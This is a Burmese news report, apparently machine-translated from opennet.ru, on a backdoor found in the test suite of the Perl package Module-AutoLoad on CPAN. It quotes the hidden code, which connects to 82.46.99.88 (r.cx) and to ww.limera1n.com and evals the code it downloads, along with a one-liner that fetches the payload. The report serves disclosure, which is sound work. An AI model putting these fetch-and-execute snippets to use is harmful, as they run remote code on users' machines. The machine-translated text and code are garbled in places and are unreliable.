Module-AutoLoad Perl ပက်ကေ့ဂျ်တွင် မလိုလားအပ်သောကုဒ်ကို တွေ့ရှိခဲ့သည်။

CPAN လမ်းညွှန်မှတဆင့်ဖြန့်ဝေထားသော Perl ပက်ကေ့ခ်ျတစ်ခုတွင် Module-AutoLoadCPAN modules များကို အလိုအလျောက် တင်နိုင်ရန် ဒီဇိုင်းထုတ်ထားပြီး၊ ဖော်ထုတ်ခဲ့သည်။ အန္တရာယ်ရှိသောကုဒ်။ အန္တရာယ်ရှိသော ထည့်သွင်းမှုဖြစ်ခဲ့သည်။ တွေ့တယ်။ စမ်းသပ်ကုဒ်ထဲမှာ ၀၅_rcx.t2011 ခုနှစ်ကတည်းက ပို့ဆောင်ပေးခဲ့ပါတယ်။
မေးခွန်းထုတ်နိုင်သောကုဒ်ကို တင်ခြင်းနှင့်ပတ်သက်၍ မေးခွန်းများပေါ်လာသည်မှာ မှတ်သားစရာဖြစ်သည်။ Stackoverflow 2016 တွင်ပြန်။

မော်ဂျူးကိုထည့်သွင်းသည့်အခါ စမ်းသပ်မှုအစုံကို စတင်လုပ်ဆောင်နေစဉ်တွင် ပြင်ပကုမ္ပဏီဆာဗာ (http://r.cx:1/) မှ ကုဒ်ကို ဒေါင်းလုဒ်လုပ်ပြီး လုပ်ဆောင်ရန် ကြိုးပမ်းမှုတွင် အန္တရာယ်ရှိသော လုပ်ဆောင်ချက်သည် အကျုံးဝင်ပါသည်။ ပြင်ပဆာဗာမှ အစပိုင်းတွင် ဒေါင်းလုဒ်လုပ်ထားသောကုဒ်သည် အန္တရာယ်မရှိဟု ယူဆရသော်လည်း ယခုအခါ ၎င်းတောင်းဆိုချက်သည် ကုဒ်၏အပိုင်းကို ပံ့ပိုးပေးသည့် ww.limera1n.com ဒိုမိန်းသို့ ပြန်လည်ညွှန်းပေးလိုက်ပြီဖြစ်သည်။

ဖိုင်တစ်ခုတွင် ဒေါင်းလုဒ်ကို စုစည်းရန် ၀၅_rcx.t အောက်ပါကုဒ်ကို အသုံးပြုသည်-

ကျွန်ုပ်၏ $prog = __FILE__;
$prog =~ s{[^/]+\.t}{../contrib/RCX.pl}x;
ကျွန်ုပ်၏ $try = `$^X $prog`;

သတ်မှတ်ထားသောကုဒ်သည် script ကို လည်ပတ်စေပါသည်။ ../contrib/RCX.plစာကြောင်းသို့ လျှော့ချထားသည့် အကြောင်းအရာများ၊

lib do{eval<$b>&&botstrap("RCX")if$b=new IO::Socket::INET 82.46.99.88":1″};

ဒီဇာတ်ညွှန်းက တက်လာတယ်။ ရှုပ်သည်။ ဝန်ဆောင်မှုကို အသုံးပြု perlobfuscator.com ပြင်ပအိမ်ရှင် r.cx မှကုဒ် (အက္ခရာကုဒ်များ 82.46.99.88 သည် "R.cX" စာသားနှင့် ကိုက်ညီသည်) နှင့် ၎င်းကို eval ဘလောက်တွင် လုပ်ဆောင်သည်။

$perl -MIO::Socket -e'$b=new IO::Socket::INET 82.46.99.88":1″; print <$b>;'
eval unpack u=>q{_<')I;G1[)&(];F5W($E/.CI3;V-K970Z.DE….}

ထုပ်ပိုးပြီးနောက်၊ အောက်ပါတို့ကို နောက်ဆုံးတွင် လုပ်ဆောင်သည်- ကုဒ်:

print{$b=new IO::Socket::INET"ww.limera1n.com:80″}"GET /iJailBreak
";evalor return သတိပေး $@while$b;1

ပြဿနာရှိသော ပက်ကေ့ဂျ်ကို ယခုအခါ သိုလှောင်ခန်းမှ ဖယ်ရှားလိုက်ပါပြီ။ ရပ်ပါ (Perl Authors Upload Server) နှင့် module စာရေးသူ၏အကောင့်ကို ပိတ်ဆို့ထားသည်။ ဤကိစ္စတွင်၊ module သည်ကျန်ရှိနေဆဲဖြစ်သည်။ ရရှိနိုင် MetaCPAN archive တွင် cpanminus ကဲ့သို့သော utilities အချို့ကို အသုံးပြု၍ MetaCPAN မှ တိုက်ရိုက်ထည့်သွင်းနိုင်သည်။ မှတ်ချက်ချသည်။အထုပ်ကို ကျယ်ကျယ် ပြန့်ပြန့် မဝေငှပါ။

ဆွေးနွေးဖို့ စိတ်ဝင်စားစရာပါ။ ချိတ်ဆက်ထားသည်။ ၎င်း၏ဆိုက် “r.cx” ဟက်ခ်ခံရပြီးနောက် အန္တရာယ်ရှိသောကုဒ်ကို ထည့်သွင်းထားသည့် အချက်အလက်ကို ငြင်းဆိုခဲ့သည့် သင်ခန်းစာ၏စာရေးဆရာက ၎င်းသည် အပျော်သက်သက်ဖြစ်ကြောင်း ရှင်းပြကာ တစ်စုံတစ်ခုကို ဖုံးကွယ်ရန်မဟုတ်ဘဲ အရွယ်အစားကို လျှော့ချရန်အတွက် perlobfuscator.com ကို အသုံးပြုခဲ့သည်။ ကုဒ်ကို ကလစ်ဘုတ်မှတဆင့် ကူးယူခြင်းကို ရိုးရှင်းစေသည်။ လုပ်ဆောင်ချက်အမည် "botstrap" ၏ရွေးချယ်မှုကို ဤစကားလုံးသည် "bot ကဲ့သို့အသံဖြစ်ပြီး bootstrap ထက်တိုသည်" ဟူသောအချက်ဖြင့်ရှင်းပြသည်။ မော်ဂျူး၏ရေးသားသူသည် ဖော်ထုတ်ထားသော ခြယ်လှယ်မှုများသည် အန္တရာယ်ရှိသော လုပ်ဆောင်ချက်များကို မလုပ်ဆောင်ကြောင်း အာမခံသည်၊ သို့သော် TCP မှတစ်ဆင့် ကုဒ်တင်ခြင်းနှင့် လုပ်ဆောင်ခြင်းကိုသာ သရုပ်ပြပါသည်။

source: opennet.ru

မှတ်ချက် Add